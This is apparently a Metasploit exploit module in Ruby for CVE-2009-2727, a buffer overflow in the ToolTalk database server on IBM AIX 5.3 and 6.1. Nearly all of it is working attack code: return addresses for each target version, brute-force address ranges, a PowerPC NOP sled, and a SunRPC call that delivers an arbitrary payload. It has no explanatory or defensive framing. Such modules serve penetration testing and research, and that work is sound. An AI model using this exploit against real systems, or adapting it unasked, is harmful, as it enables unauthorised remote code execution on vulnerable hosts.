## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => 'ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)', 'Description' => %q{ This module exploits a buffer overflow vulnerability in _tt_internal_realpath function of the ToolTalk database server (rpc.ttdbserverd). }, 'Author' => [ 'Ramon de C Valle', 'Adriano Lima ', ], 'Platform' => [ 'aix' ], 'References' => [ [ 'CVE', '2009-2727'], ], 'Payload' => { 'BadChars' => "\x00", }, 'Targets' => [ [ 'IBM AIX Version 6.1.4', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20099430+4096, 'Addr1' => 0x2ff1ff50-8192, 'AIX' => '6.1.4', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099430-8192 }, 'Stop' => { 'Ret' => 0x20099430+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 6.1.3', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.3', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, 'Stop' => { 'Ret' => 0x20099280+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 6.1.2', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.2', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, 'Stop' => { 'Ret' => 0x20099280+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 6.1.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.1', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, 'Stop' => { 'Ret' => 0x20099280+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 6.1.0', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.0', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, 'Stop' => { 'Ret' => 0x20099280+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20096ba0+4096, 'Addr1' => 0x2ff1ff14-8192, 'AIX' => '5.3.9', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096ba0-8192 }, 'Stop' => { 'Ret' => 0x20096ba0+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 5.3.10', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20096bf0+4096, 'Addr1' => 0x2ff1ff14-8192, 'AIX' => '5.3.10', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096bf0-8192 }, 'Stop' => { 'Ret' => 0x20096bf0+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 5.3.9', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20096ba0+4096, 'Addr1' => 0x2ff1ff14-8192, 'AIX' => '5.3.9', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096ba0-8192 }, 'Stop' => { 'Ret' => 0x20096ba0+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 5.3.8', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20096c10+4096, 'Addr1' => 0x2ff1ff98-8192, 'AIX' => '5.3.8', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096c10-8192 }, 'Stop' => { 'Ret' => 0x20096c10+8192 }, 'Step' => 1024 } } ], [ 'IBM AIX Version 5.3.7', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0x20096c10+4096, 'Addr1' => 0x2ff1ff98-8192, 'AIX' => '5.3.7', 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096c10-8192 }, 'Stop' => { 'Ret' => 0x20096c10+8192 }, 'Step' => 1024 } } ], [ 'Debug IBM AIX Version 6.1', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0xaabbccdd, 'Addr1' => 0xddccbbaa, 'AIX' => '6.1.4', 'Bruteforce' => { 'Start' => { 'Ret' => 0xaabbccdd }, 'Stop' => { 'Ret' => 0xaabbccdd }, 'Step' => 1024 } } ], [ 'Debug IBM AIX Version 5.3', { 'Arch' => 'ppc', 'Platform' => 'aix', 'Ret' => 0xaabbccdd, 'Addr1' => 0xddccbbaa, 'AIX' => '5.3.10', 'Bruteforce' => { 'Start' => { 'Ret' => 0xaabbccdd }, 'Stop' => { 'Ret' => 0xaabbccdd }, 'Step' => 1024 } } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 17 2009')) end def brute_exploit(brute_target) if not @aixpayload datastore['AIX'] = target['AIX'] @aixpayload = regenerate_payload.encoded end print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) begin sunrpc_create('tcp', 100083, 1) if target['AIX'] =~ /6\./ buf = "A" else buf = "AA" end buf << [target['Addr1']].pack('N') * (1022 + 8) buf << [brute_target['Ret']].pack('N') * 32 if target['AIX'] =~ /6\./ buf << "AAA" else buf << "AA" end buf << "\x7f\xff\xfb\x78" * 1920 buf << @aixpayload buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000) print_status('Sending procedure 15 call message...') sunrpc_call(15, buf) sunrpc_destroy handler rescue Rex::Proto::SunRPC::RPCTimeout # print_error('RPCTimeout') rescue EOFError # print_error('EOFError') end end end